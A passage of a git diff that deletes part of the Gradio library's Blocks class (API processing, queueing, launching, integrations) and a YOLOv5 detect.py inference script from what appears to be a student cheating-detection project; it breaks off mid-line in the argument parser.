components._Keywords.FINISHED_ITERATING: - output.append(None) - continue - block = self.blocks[output_id] - if getattr(block, "stateful", False): - if not utils.is_update(predictions[i]): - state[output_id] = predictions[i] - output.append(None) - else: - prediction_value = predictions[i] - if utils.is_update(prediction_value): - assert isinstance(prediction_value, dict) - prediction_value = postprocess_update_dict( - block=block, - update_dict=prediction_value, - postprocess=block_fn.postprocess, - ) - elif block_fn.postprocess: - assert isinstance( - block, components.Component - ), f"{block.__class__} Component with id {output_id} not a valid output component." - prediction_value = block.postprocess(prediction_value) - output.append(prediction_value) - return output - - async def process_api( - self, - fn_index: int, - inputs: List[Any], - state: Dict[int, Any], - request: routes.Request | List[routes.Request] | None = None, - iterators: Dict[int, Any] | None = None, - event_id: str | None = None, - ) -> Dict[str, Any]: - """ - Processes API calls from the frontend. First preprocesses the data, - then runs the relevant function, then postprocesses the output. - Parameters: - fn_index: Index of function to run. 
- inputs: input data received from the frontend - username: name of user if authentication is set up (not used) - state: data stored from stateful components for session (key is input block id) - iterators: the in-progress iterators for each generator function (key is function index) - Returns: None - """ - block_fn = self.fns[fn_index] - batch = self.dependencies[fn_index]["batch"] - - if batch: - max_batch_size = self.dependencies[fn_index]["max_batch_size"] - batch_sizes = [len(inp) for inp in inputs] - batch_size = batch_sizes[0] - if inspect.isasyncgenfunction(block_fn.fn) or inspect.isgeneratorfunction( - block_fn.fn - ): - raise ValueError("Gradio does not support generators in batch mode.") - if not all(x == batch_size for x in batch_sizes): - raise ValueError( - f"All inputs to a batch function must have the same length but instead have sizes: {batch_sizes}." - ) - if batch_size > max_batch_size: - raise ValueError( - f"Batch size ({batch_size}) exceeds the max_batch_size for this function ({max_batch_size})" - ) - - inputs = [ - self.preprocess_data(fn_index, list(i), state) for i in zip(*inputs) - ] - result = await self.call_function( - fn_index, list(zip(*inputs)), None, request - ) - preds = result["prediction"] - data = [ - self.postprocess_data(fn_index, list(o), state) for o in zip(*preds) - ] - data = list(zip(*data)) - is_generating, iterator = None, None - else: - inputs = self.preprocess_data(fn_index, inputs, state) - iterator = iterators.get(fn_index, None) if iterators else None - result = await self.call_function( - fn_index, inputs, iterator, request, event_id - ) - data = self.postprocess_data(fn_index, result["prediction"], state) - is_generating, iterator = result["is_generating"], result["iterator"] - - block_fn.total_runtime += result["duration"] - block_fn.total_runs += 1 - - return { - "data": data, - "is_generating": is_generating, - "iterator": iterator, - "duration": result["duration"], - "average_duration": block_fn.total_runtime / block_fn.total_runs, - } - - async def create_limiter(self): - self.limiter = ( - None - if self.max_threads == 40 - else CapacityLimiter(total_tokens=self.max_threads) - ) - - def get_config(self): - return {"type": "column"} - - def get_config_file(self): - config = { - "version": routes.VERSION, - "mode": self.mode, - "dev_mode": self.dev_mode, - "components": [], - "theme": self.theme, - "css": self.css, - "title": self.title or "Gradio", - "is_space": self.is_space, - "enable_queue": getattr(self, "enable_queue", False), # launch attributes - "show_error": getattr(self, "show_error", False), - "show_api": self.show_api, - "is_colab": utils.colab_check(), - } - - def getLayout(block): - if not isinstance(block, BlockContext): - return {"id": block._id} - children_layout = [] - for child in block.children: - children_layout.append(getLayout(child)) - return {"id": block._id, "children": children_layout} - - config["layout"] = getLayout(self) - - for _id, block in self.blocks.items(): - config["components"].append( - { - "id": _id, - "type": (block.get_block_name()), - "props": utils.delete_none(block.get_config()) - if hasattr(block, "get_config") - else {}, - } - ) - config["dependencies"] = self.dependencies - return config - - def __enter__(self): - if Context.block is None: - Context.root_block = self - self.parent = Context.block - Context.block = self - return self - - def __exit__(self, *args): - super().fill_expected_parents() - Context.block = self.parent - # Configure the load events before root_block is reset - 
self.attach_load_events() - if self.parent is None: - Context.root_block = None - else: - self.parent.children.extend(self.children) - self.config = self.get_config_file() - self.app = routes.App.create_app(self) - - @class_or_instancemethod - def load( - self_or_cls, - fn: Callable | None = None, - inputs: List[Component] | None = None, - outputs: List[Component] | None = None, - api_name: str | None = None, - scroll_to_output: bool = False, - show_progress: bool = True, - queue=None, - batch: bool = False, - max_batch_size: int = 4, - preprocess: bool = True, - postprocess: bool = True, - every: float | None = None, - _js: str | None = None, - *, - name: str | None = None, - src: str | None = None, - api_key: str | None = None, - alias: str | None = None, - **kwargs, - ) -> Blocks | Dict[str, Any] | None: - """ - For reverse compatibility reasons, this is both a class method and an instance - method, the two of which, confusingly, do two completely different things. - - - Class method: loads a demo from a Hugging Face Spaces repo and creates it locally and returns a block instance. Equivalent to gradio.Interface.load() - - - Instance method: adds event that runs as soon as the demo loads in the browser. Example usage below. - Parameters: - name: Class Method - the name of the model (e.g. "gpt2" or "facebook/bart-base") or space (e.g. "flax-community/spanish-gpt2"), can include the `src` as prefix (e.g. "models/facebook/bart-base") - src: Class Method - the source of the model: `models` or `spaces` (or leave empty if source is provided as a prefix in `name`) - api_key: Class Method - optional access token for loading private Hugging Face Hub models or spaces. Find your token here: https://huggingface.co/settings/tokens - alias: Class Method - optional string used as the name of the loaded model instead of the default name (only applies if loading a Space running Gradio 2.x) - fn: Instance Method - the function to wrap an interface around. Often a machine learning model's prediction function. Each parameter of the function corresponds to one input component, and the function should return a single value or a tuple of values, with each element in the tuple corresponding to one output component. - inputs: Instance Method - List of gradio.components to use as inputs. If the function takes no inputs, this should be an empty list. - outputs: Instance Method - List of gradio.components to use as outputs. If the function returns no outputs, this should be an empty list. - api_name: Instance Method - Defining this parameter exposes the endpoint in the api docs - scroll_to_output: Instance Method - If True, will scroll to output component on completion - show_progress: Instance Method - If True, will show progress animation while pending - queue: Instance Method - If True, will place the request on the queue, if the queue exists - batch: Instance Method - If True, then the function should process a batch of inputs, meaning that it should accept a list of input values for each parameter. The lists should be of equal length (and be up to length `max_batch_size`). The function is then *required* to return a tuple of lists (even if there is only 1 output component), with each list in the tuple corresponding to one output component. - max_batch_size: Instance Method - Maximum number of inputs to batch together if this is called from the queue (only relevant if batch=True) - preprocess: Instance Method - If False, will not run preprocessing of component data before running 'fn' (e.g.
leaving it as a base64 string if this method is called with the `Image` component). - postprocess: Instance Method - If False, will not run postprocessing of component data before returning 'fn' output to the browser. - every: Instance Method - Run this event 'every' number of seconds. Interpreted in seconds. Queue must be enabled. - Example: - import gradio as gr - import datetime - with gr.Blocks() as demo: - def get_time(): - return datetime.datetime.now().time() - dt = gr.Textbox(label="Current time") - demo.load(get_time, inputs=None, outputs=dt) - demo.launch() - """ - # _js: Optional frontend js method to run before running 'fn'. Input arguments for js method are values of 'inputs' and 'outputs', return should be a list of values for output components. - if isinstance(self_or_cls, type): - if name is None: - raise ValueError( - "Blocks.load() requires passing parameters as keyword arguments" - ) - return external.load_blocks_from_repo(name, src, api_key, alias, **kwargs) - else: - return self_or_cls.set_event_trigger( - event_name="load", - fn=fn, - inputs=inputs, - outputs=outputs, - api_name=api_name, - preprocess=preprocess, - postprocess=postprocess, - scroll_to_output=scroll_to_output, - show_progress=show_progress, - js=_js, - queue=queue, - batch=batch, - max_batch_size=max_batch_size, - every=every, - no_target=True, - ) - - def clear(self): - """Resets the layout of the Blocks object.""" - self.blocks = {} - self.fns = [] - self.dependencies = [] - self.children = [] - return self - - @document() - def queue( - self, - concurrency_count: int = 1, - status_update_rate: float | Literal["auto"] = "auto", - client_position_to_load_data: int | None = None, - default_enabled: bool | None = None, - api_open: bool = True, - max_size: int | None = None, - ): - """ - You can control the rate of processed requests by creating a queue. This will allow you to set the number of requests to be processed at one time, and will let users know their position in the queue. - Parameters: - concurrency_count: Number of worker threads that will be processing requests from the queue concurrently. Increasing this number will increase the rate at which requests are processed, but will also increase the memory usage of the queue. - status_update_rate: If "auto", Queue will send status estimations to all clients whenever a job is finished. Otherwise Queue will send status at regular intervals set by this parameter as the number of seconds. - client_position_to_load_data: DEPRECATED. This parameter is deprecated and has no effect. - default_enabled: Deprecated and has no effect. - api_open: If True, the REST routes of the backend will be open, allowing requests made directly to those endpoints to skip the queue. - max_size: The maximum number of events the queue will store at any given moment. If the queue is full, new events will not be added and a user will receive a message saying that the queue is full. If None, the queue size will be unlimited. - Example: - demo = gr.Interface(gr.Textbox(), gr.Image(), image_generator) - demo.queue(concurrency_count=3) - demo.launch() - """ - if default_enabled is not None: - warnings.warn( - "The default_enabled parameter of queue has no effect and will be removed " - "in a future version of gradio." 
- ) - self.enable_queue = True - self.api_open = api_open - if client_position_to_load_data is not None: - warnings.warn("The client_position_to_load_data parameter is deprecated.") - self._queue = queueing.Queue( - live_updates=status_update_rate == "auto", - concurrency_count=concurrency_count, - update_intervals=status_update_rate if status_update_rate != "auto" else 1, - max_size=max_size, - blocks_dependencies=self.dependencies, - ) - self.config = self.get_config_file() - return self - - def launch( - self, - inline: bool | None = None, - inbrowser: bool = False, - share: bool | None = None, - debug: bool = False, - enable_queue: bool | None = None, - max_threads: int = 40, - auth: Callable | Tuple[str, str] | List[Tuple[str, str]] | None = None, - auth_message: str | None = None, - prevent_thread_lock: bool = False, - show_error: bool = False, - server_name: str | None = None, - server_port: int | None = None, - show_tips: bool = False, - height: int = 500, - width: int | str = "100%", - encrypt: bool = False, - favicon_path: str | None = None, - ssl_keyfile: str | None = None, - ssl_certfile: str | None = None, - ssl_keyfile_password: str | None = None, - quiet: bool = False, - show_api: bool = True, - _frontend: bool = True, - ) -> Tuple[FastAPI, str, str]: - """ - Launches a simple web server that serves the demo. Can also be used to create a - public link used by anyone to access the demo from their browser by setting share=True. - - Parameters: - inline: whether to display in the interface inline in an iframe. Defaults to True in python notebooks; False otherwise. - inbrowser: whether to automatically launch the interface in a new tab on the default browser. - share: whether to create a publicly shareable link for the interface. Creates an SSH tunnel to make your UI accessible from anywhere. If not provided, it is set to False by default every time, except when running in Google Colab. When localhost is not accessible (e.g. Google Colab), setting share=False is not supported. - debug: if True, blocks the main thread from running. If running in Google Colab, this is needed to print the errors in the cell output. - auth: If provided, username and password (or list of username-password tuples) required to access interface. Can also provide function that takes username and password and returns True if valid login. - auth_message: If provided, HTML message provided on login page. - prevent_thread_lock: If True, the interface will block the main thread while the server is running. - show_error: If True, any errors in the interface will be displayed in an alert modal and printed in the browser console log - server_port: will start gradio app on this port (if available). Can be set by environment variable GRADIO_SERVER_PORT. If None, will search for an available port starting at 7860. - server_name: to make app accessible on local network, set this to "0.0.0.0". Can be set by environment variable GRADIO_SERVER_NAME. If None, will use "127.0.0.1". - show_tips: if True, will occasionally show tips about new Gradio features - enable_queue: DEPRECATED (use .queue() method instead.) if True, inference requests will be served through a queue instead of with parallel threads. Required for longer inference times (> 1min) to prevent timeout. The default option in HuggingFace Spaces is True. The default option elsewhere is False. - max_threads: the maximum number of total threads that the Gradio app can generate in parallel. The default is inherited from the starlette library (currently 40). 
Applies whether the queue is enabled or not. But if queuing is enabled, this parameter is increaseed to be at least the concurrency_count of the queue. - width: The width in pixels of the iframe element containing the interface (used if inline=True) - height: The height in pixels of the iframe element containing the interface (used if inline=True) - encrypt: If True, flagged data will be encrypted by key provided by creator at launch - favicon_path: If a path to a file (.png, .gif, or .ico) is provided, it will be used as the favicon for the web page. - ssl_keyfile: If a path to a file is provided, will use this as the private key file to create a local server running on https. - ssl_certfile: If a path to a file is provided, will use this as the signed certificate for https. Needs to be provided if ssl_keyfile is provided. - ssl_keyfile_password: If a password is provided, will use this with the ssl certificate for https. - quiet: If True, suppresses most print statements. - show_api: If True, shows the api docs in the footer of the app. Default True. If the queue is enabled, then api_open parameter of .queue() will determine if the api docs are shown, independent of the value of show_api. - Returns: - app: FastAPI app object that is running the demo - local_url: Locally accessible link to the demo - share_url: Publicly accessible link to the demo (if share=True, otherwise None) - Example: - import gradio as gr - def reverse(text): - return text[::-1] - demo = gr.Interface(reverse, "text", "text") - demo.launch(share=True, auth=("username", "password")) - """ - self.dev_mode = False - if ( - auth - and not callable(auth) - and not isinstance(auth[0], tuple) - and not isinstance(auth[0], list) - ): - self.auth = [auth] - else: - self.auth = auth - self.auth_message = auth_message - self.show_tips = show_tips - self.show_error = show_error - self.height = height - self.width = width - self.favicon_path = favicon_path - self.progress_tracking = any( - block_fn.fn is not None and special_args(block_fn.fn)[1] is not None - for block_fn in self.fns - ) - - if enable_queue is not None: - self.enable_queue = enable_queue - warnings.warn( - "The `enable_queue` parameter has been deprecated. Please use the `.queue()` method instead.", - DeprecationWarning, - ) - - if self.is_space: - self.enable_queue = self.enable_queue is not False - else: - self.enable_queue = self.enable_queue is True - if self.enable_queue and not hasattr(self, "_queue"): - self.queue() - self.show_api = self.api_open if self.enable_queue else show_api - - if not self.enable_queue and self.progress_tracking: - raise ValueError("Progress tracking requires queuing to be enabled.") - - for dep in self.dependencies: - for i in dep["cancels"]: - if not self.queue_enabled_for_fn(i): - raise ValueError( - "In order to cancel an event, the queue for that event must be enabled! " - "You may get this error by either 1) passing a function that uses the yield keyword " - "into an interface without enabling the queue or 2) defining an event that cancels " - "another event without enabling the queue. 
Both can be solved by calling .queue() " - "before .launch()" - ) - if dep["batch"] and ( - dep["queue"] is False - or (dep["queue"] is None and not self.enable_queue) - ): - raise ValueError("In order to use batching, the queue must be enabled.") - - self.config = self.get_config_file() - self.encrypt = encrypt - self.max_threads = max( - self._queue.max_thread_count if self.enable_queue else 0, max_threads - ) - if self.encrypt: - self.encryption_key = encryptor.get_key( - getpass.getpass("Enter key for encryption: ") - ) - - if self.is_running: - assert isinstance( - self.local_url, str - ), f"Invalid local_url: {self.local_url}" - if not (quiet): - print( - "Rerunning server... use `close()` to stop if you need to change `launch()` parameters.\n----" - ) - else: - server_name, server_port, local_url, app, server = networking.start_server( - self, - server_name, - server_port, - ssl_keyfile, - ssl_certfile, - ssl_keyfile_password, - ) - self.server_name = server_name - self.local_url = local_url - self.server_port = server_port - self.server_app = app - self.server = server - self.is_running = True - self.is_colab = utils.colab_check() - self.protocol = ( - "https" - if self.local_url.startswith("https") or self.is_colab - else "http" - ) - - if self.enable_queue: - self._queue.set_url(self.local_url) - - # Cannot run async functions in background other than app's scope. - # Workaround by triggering the app endpoint - requests.get(f"{self.local_url}startup-events") - - if self.enable_queue: - if self.encrypt: - raise ValueError("Cannot queue with encryption enabled.") - utils.launch_counter() - - self.share = ( - share - if share is not None - else True - if self.is_colab and self.enable_queue - else False - ) - - # If running in a colab or not able to access localhost, - # a shareable link must be created. - if _frontend and (not networking.url_ok(self.local_url)) and (not self.share): - raise ValueError( - "When localhost is not accessible, a shareable link must be created. Please set share=True." - ) - - if self.is_colab: - if not quiet: - if debug: - print(strings.en["COLAB_DEBUG_TRUE"]) - else: - print(strings.en["COLAB_DEBUG_FALSE"]) - if not self.share: - print(strings.en["COLAB_WARNING"].format(self.server_port)) - if self.enable_queue and not self.share: - raise ValueError( - "When using queueing in Colab, a shareable link must be created. Please set share=True." 
- ) - else: - print( - strings.en["RUNNING_LOCALLY_SEPARATED"].format( - self.protocol, self.server_name, self.server_port - ) - ) - - if self.share: - if self.is_space: - raise RuntimeError("Share is not supported when you are in Spaces") - try: - if self.share_url is None: - self.share_url = networking.setup_tunnel( - self.server_name, self.server_port - ) - print(strings.en["SHARE_LINK_DISPLAY"].format(self.share_url)) - if not (quiet): - print(strings.en["SHARE_LINK_MESSAGE"]) - except RuntimeError: - if self.analytics_enabled: - utils.error_analytics(self.ip_address, "Not able to set up tunnel") - self.share_url = None - self.share = False - print(strings.en["COULD_NOT_GET_SHARE_LINK"]) - else: - if not (quiet): - print(strings.en["PUBLIC_SHARE_TRUE"]) - self.share_url = None - - if inbrowser: - link = self.share_url if self.share and self.share_url else self.local_url - webbrowser.open(link) - - # Check if running in a Python notebook in which case, display inline - if inline is None: - inline = utils.ipython_check() and (self.auth is None) - if inline: - if self.auth is not None: - print( - "Warning: authentication is not supported inline. Please" - "click the link to access the interface in a new tab." - ) - try: - from IPython.display import HTML, Javascript, display # type: ignore - - if self.share and self.share_url: - while not networking.url_ok(self.share_url): - time.sleep(0.25) - display( - HTML( - f'
    ' - ) - ) - elif self.is_colab: - # modified from /usr/local/lib/python3.7/dist-packages/google/colab/output/_util.py within Colab environment - code = """(async (port, path, width, height, cache, element) => { - if (!google.colab.kernel.accessAllowed && !cache) { - return; - } - element.appendChild(document.createTextNode('')); - const url = await google.colab.kernel.proxyPort(port, {cache}); - - const external_link = document.createElement('div'); - external_link.innerHTML = ` - - `; - element.appendChild(external_link); - - const iframe = document.createElement('iframe'); - iframe.src = new URL(path, url).toString(); - iframe.height = height; - iframe.allow = "autoplay; camera; microphone; clipboard-read; clipboard-write;" - iframe.width = width; - iframe.style.border = 0; - element.appendChild(iframe); - })""" + "({port}, {path}, {width}, {height}, {cache}, window.element)".format( - port=json.dumps(self.server_port), - path=json.dumps("/"), - width=json.dumps(self.width), - height=json.dumps(self.height), - cache=json.dumps(False), - ) - - display(Javascript(code)) - else: - display( - HTML( - f'
    ' - ) - ) - except ImportError: - pass - - if getattr(self, "analytics_enabled", False): - data = { - "launch_method": "browser" if inbrowser else "inline", - "is_google_colab": self.is_colab, - "is_sharing_on": self.share, - "share_url": self.share_url, - "ip_address": self.ip_address, - "enable_queue": self.enable_queue, - "show_tips": self.show_tips, - "server_name": server_name, - "server_port": server_port, - "is_spaces": self.is_space, - "mode": self.mode, - } - utils.launch_analytics(data) - - utils.show_tip(self) - - # Block main thread if debug==True - if debug or int(os.getenv("GRADIO_DEBUG", 0)) == 1: - self.block_thread() - # Block main thread if running in a script to stop script from exiting - is_in_interactive_mode = bool(getattr(sys, "ps1", sys.flags.interactive)) - - if not prevent_thread_lock and not is_in_interactive_mode: - self.block_thread() - - return TupleNoPrint((self.server_app, self.local_url, self.share_url)) - - def integrate( - self, - comet_ml: comet_ml.Experiment | None = None, - wandb: ModuleType | None = None, - mlflow: ModuleType | None = None, - ) -> None: - """ - A catch-all method for integrating with other libraries. This method should be run after launch() - Parameters: - comet_ml: If a comet_ml Experiment object is provided, will integrate with the experiment and appear on Comet dashboard - wandb: If the wandb module is provided, will integrate with it and appear on WandB dashboard - mlflow: If the mlflow module is provided, will integrate with the experiment and appear on ML Flow dashboard - """ - analytics_integration = "" - if comet_ml is not None: - analytics_integration = "CometML" - comet_ml.log_other("Created from", "Gradio") - if self.share_url is not None: - comet_ml.log_text("gradio: " + self.share_url) - comet_ml.end() - elif self.local_url: - comet_ml.log_text("gradio: " + self.local_url) - comet_ml.end() - else: - raise ValueError("Please run `launch()` first.") - if wandb is not None: - analytics_integration = "WandB" - if self.share_url is not None: - wandb.log( - { - "Gradio panel": wandb.Html( - '' - ) - } - ) - else: - print( - "The WandB integration requires you to " - "`launch(share=True)` first." - ) - if mlflow is not None: - analytics_integration = "MLFlow" - if self.share_url is not None: - mlflow.log_param("Gradio Interface Share Link", self.share_url) - else: - mlflow.log_param("Gradio Interface Local Link", self.local_url) - if self.analytics_enabled and analytics_integration: - data = {"integration": analytics_integration} - utils.integration_analytics(data) - - def close(self, verbose: bool = True) -> None: - """ - Closes the Interface that was launched and frees the port. - """ - try: - if self.enable_queue: - self._queue.close() - self.server.close() - self.is_running = False - if verbose: - print("Closing server running on port: {}".format(self.server_port)) - except (AttributeError, OSError): # can't close if not running - pass - - def block_thread( - self, - ) -> None: - """Block main thread until interrupted by user.""" - try: - while True: - time.sleep(0.1) - except (KeyboardInterrupt, OSError): - print("Keyboard interruption in main thread... 
closing server.") - self.server.close() - for tunnel in CURRENT_TUNNELS: - tunnel.kill() - - def attach_load_events(self): - """Add a load event for every component whose initial value should be randomized.""" - if Context.root_block: - for component in Context.root_block.blocks.values(): - if ( - isinstance(component, components.IOComponent) - and component.load_event_to_attach - ): - load_fn, every = component.load_event_to_attach - # Use set_event_trigger to avoid ambiguity between load class/instance method - self.set_event_trigger( - "load", - load_fn, - None, - component, - no_target=True, - queue=False, - every=every, - ) - - def startup_events(self): - """Events that should be run when the app containing this block starts up.""" - - if self.enable_queue: - utils.run_coro_in_background(self._queue.start, (self.progress_tracking,)) - utils.run_coro_in_background(self.create_limiter) - - def queue_enabled_for_fn(self, fn_index: int): - if self.dependencies[fn_index]["queue"] is None: - return self.enable_queue - return self.dependencies[fn_index]["queue"] diff --git a/spaces/Ibtehaj10/cheating-detection-FYP/yolovs5/detect.py b/spaces/Ibtehaj10/cheating-detection-FYP/yolovs5/detect.py deleted file mode 100644 index 58b02802e6d9d3661c476dd88bf52b08b8445eef..0000000000000000000000000000000000000000 --- a/spaces/Ibtehaj10/cheating-detection-FYP/yolovs5/detect.py +++ /dev/null @@ -1,259 +0,0 @@ -# YOLOv5 🚀 by Ultralytics, GPL-3.0 license -""" -Run YOLOv5 detection inference on images, videos, directories, globs, YouTube, webcam, streams, etc. - -Usage - sources: - $ python detect.py --weights yolov5s.pt --source 0 # webcam - img.jpg # image - vid.mp4 # video - screen # screenshot - path/ # directory - 'path/*.jpg' # glob - 'https://youtu.be/Zgi9g1ksQHc' # YouTube - 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP stream - -Usage - formats: - $ python detect.py --weights yolov5s.pt # PyTorch - yolov5s.torchscript # TorchScript - yolov5s.onnx # ONNX Runtime or OpenCV DNN with --dnn - yolov5s_openvino_model # OpenVINO - yolov5s.engine # TensorRT - yolov5s.mlmodel # CoreML (macOS-only) - yolov5s_saved_model # TensorFlow SavedModel - yolov5s.pb # TensorFlow GraphDef - yolov5s.tflite # TensorFlow Lite - yolov5s_edgetpu.tflite # TensorFlow Edge TPU - yolov5s_paddle_model # PaddlePaddle -""" - -import argparse -import os -import platform -import sys -from pathlib import Path - -import torch - -FILE = Path(__file__).resolve() -ROOT = FILE.parents[0] # YOLOv5 root directory -if str(ROOT) not in sys.path: - sys.path.append(str(ROOT)) # add ROOT to PATH -ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative - -from models.common import DetectMultiBackend -from utils.dataloaders import IMG_FORMATS, VID_FORMATS, LoadImages, LoadScreenshots, LoadStreams -from utils.general import (LOGGER, Profile, check_file, check_img_size, check_imshow, check_requirements, colorstr, cv2, - increment_path, non_max_suppression, print_args, scale_boxes, strip_optimizer, xyxy2xywh) -from utils.plots import Annotator, colors, save_one_box -from utils.torch_utils import select_device, smart_inference_mode - - -@smart_inference_mode() -def run( - weights=ROOT / 'yolov5s.pt', # model path or triton URL - source=ROOT / 'data/images', # file/dir/URL/glob/screen/0(webcam) - data=ROOT / 'data/coco128.yaml', # dataset.yaml path - imgsz=(640, 640), # inference size (height, width) - conf_thres=0.25, # confidence threshold - iou_thres=0.45, # NMS IOU threshold - max_det=1000, # maximum detections per image - device='', # cuda 
device, i.e. 0 or 0,1,2,3 or cpu - view_img=False, # show results - save_txt=False, # save results to *.txt - save_conf=False, # save confidences in --save-txt labels - save_crop=False, # save cropped prediction boxes - nosave=False, # do not save images/videos - classes=None, # filter by class: --class 0, or --class 0 2 3 - agnostic_nms=False, # class-agnostic NMS - augment=False, # augmented inference - visualize=False, # visualize features - update=False, # update all models - project=ROOT / 'runs/detect', # save results to project/name - name='exp', # save results to project/name - exist_ok=False, # existing project/name ok, do not increment - line_thickness=3, # bounding box thickness (pixels) - hide_labels=False, # hide labels - hide_conf=False, # hide confidences - half=False, # use FP16 half-precision inference - dnn=False, # use OpenCV DNN for ONNX inference - vid_stride=1, # video frame-rate stride -): - source = str(source) - save_img = not nosave and not source.endswith('.txt') # save inference images - is_file = Path(source).suffix[1:] in (IMG_FORMATS + VID_FORMATS) - is_url = source.lower().startswith(('rtsp://', 'rtmp://', 'http://', 'https://')) - webcam = source.isnumeric() or source.endswith('.txt') or (is_url and not is_file) - screenshot = source.lower().startswith('screen') - if is_url and is_file: - source = check_file(source) # download - - # Directories - save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run - (save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir - - # Load model - device = select_device(device) - model = DetectMultiBackend(weights, device=device, dnn=dnn, data=data, fp16=half) - stride, names, pt = model.stride, model.names, model.pt - imgsz = check_img_size(imgsz, s=stride) # check image size - - # Dataloader - bs = 1 # batch_size - if webcam: - view_img = check_imshow(warn=True) - dataset = LoadStreams(source, img_size=imgsz, stride=stride, auto=pt, vid_stride=vid_stride) - bs = len(dataset) - elif screenshot: - dataset = LoadScreenshots(source, img_size=imgsz, stride=stride, auto=pt) - else: - dataset = LoadImages(source, img_size=imgsz, stride=stride, auto=pt, vid_stride=vid_stride) - vid_path, vid_writer = [None] * bs, [None] * bs - - # Run inference - model.warmup(imgsz=(1 if pt or model.triton else bs, 3, *imgsz)) # warmup - seen, windows, dt = 0, [], (Profile(), Profile(), Profile()) - for path, im, im0s, vid_cap, s in dataset: - with dt[0]: - im = torch.from_numpy(im).to(model.device) - im = im.half() if model.fp16 else im.float() # uint8 to fp16/32 - im /= 255 # 0 - 255 to 0.0 - 1.0 - if len(im.shape) == 3: - im = im[None] # expand for batch dim - - # Inference - with dt[1]: - visualize = increment_path(save_dir / Path(path).stem, mkdir=True) if visualize else False - pred = model(im, augment=augment, visualize=visualize) - - # NMS - with dt[2]: - pred = non_max_suppression(pred, conf_thres, iou_thres, classes, agnostic_nms, max_det=max_det) - - # Second-stage classifier (optional) - # pred = utils.general.apply_classifier(pred, classifier_model, im, im0s) - - # Process predictions - for i, det in enumerate(pred): # per image - seen += 1 - if webcam: # batch_size >= 1 - p, im0, frame = path[i], im0s[i].copy(), dataset.count - s += f'{i}: ' - else: - p, im0, frame = path, im0s.copy(), getattr(dataset, 'frame', 0) - - p = Path(p) # to Path - save_path = str(save_dir / p.name) # im.jpg - txt_path = str(save_dir / 'labels' / p.stem) + ('' if dataset.mode == 'image' else 
f'_{frame}') # im.txt - s += '%gx%g ' % im.shape[2:] # print string - gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh - imc = im0.copy() if save_crop else im0 # for save_crop - annotator = Annotator(im0, line_width=line_thickness, example=str(names)) - if len(det): - # Rescale boxes from img_size to im0 size - det[:, :4] = scale_boxes(im.shape[2:], det[:, :4], im0.shape).round() - - # Print results - for c in det[:, 5].unique(): - n = (det[:, 5] == c).sum() # detections per class - s += f"{n} {names[int(c)]}{'s' * (n > 1)}, " # add to string - - # Write results - for *xyxy, conf, cls in reversed(det): - if save_txt: # Write to file - xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh - line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format - with open(f'{txt_path}.txt', 'a') as f: - f.write(('%g ' * len(line)).rstrip() % line + '\n') - - if save_img or save_crop or view_img: # Add bbox to image - c = int(cls) # integer class - label = None if hide_labels else (names[c] if hide_conf else f'{names[c]} {conf:.2f}') - annotator.box_label(xyxy, label, color=colors(c, True)) - if save_crop: - save_one_box(xyxy, imc, file=save_dir / 'crops' / names[c] / f'{p.stem}.jpg', BGR=True) - - # Stream results - im0 = annotator.result() - if view_img: - if platform.system() == 'Linux' and p not in windows: - windows.append(p) - cv2.namedWindow(str(p), cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO) # allow window resize (Linux) - cv2.resizeWindow(str(p), im0.shape[1], im0.shape[0]) - cv2.imshow(str(p), im0) - cv2.waitKey(1) # 1 millisecond - - # Save results (image with detections) - if save_img: - if dataset.mode == 'image': - cv2.imwrite(save_path, im0) - else: # 'video' or 'stream' - if vid_path[i] != save_path: # new video - vid_path[i] = save_path - if isinstance(vid_writer[i], cv2.VideoWriter): - vid_writer[i].release() # release previous video writer - if vid_cap: # video - fps = vid_cap.get(cv2.CAP_PROP_FPS) - w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH)) - h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) - else: # stream - fps, w, h = 30, im0.shape[1], im0.shape[0] - save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos - vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h)) - vid_writer[i].write(im0) - - # Print time (inference-only) - LOGGER.info(f"{s}{'' if len(det) else '(no detections), '}{dt[1].dt * 1E3:.1f}ms") - - # Print results - t = tuple(x.t / seen * 1E3 for x in dt) # speeds per image - LOGGER.info(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {(1, 3, *imgsz)}' % t) - if save_txt or save_img: - s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else '' - LOGGER.info(f"Results saved to {colorstr('bold', save_dir)}{s}") - if update: - strip_optimizer(weights[0]) # update model (to fix SourceChangeWarning) - - -def parse_opt(): - parser = argparse.ArgumentParser() - parser.add_argument('--weights', nargs='+', type=str, default=ROOT / 'yolov5s.pt', help='model path or triton URL') - parser.add_argument('--source', type=str, default=ROOT / 'data/images', help='file/dir/URL/glob/screen/0(webcam)') - parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='(optional) dataset.yaml path') - parser.add_argument('--imgsz', '--img', '--img-size', nargs='+', type=int, default=[640], help='inference size h,w') - parser.add_argument('--conf-thres', 
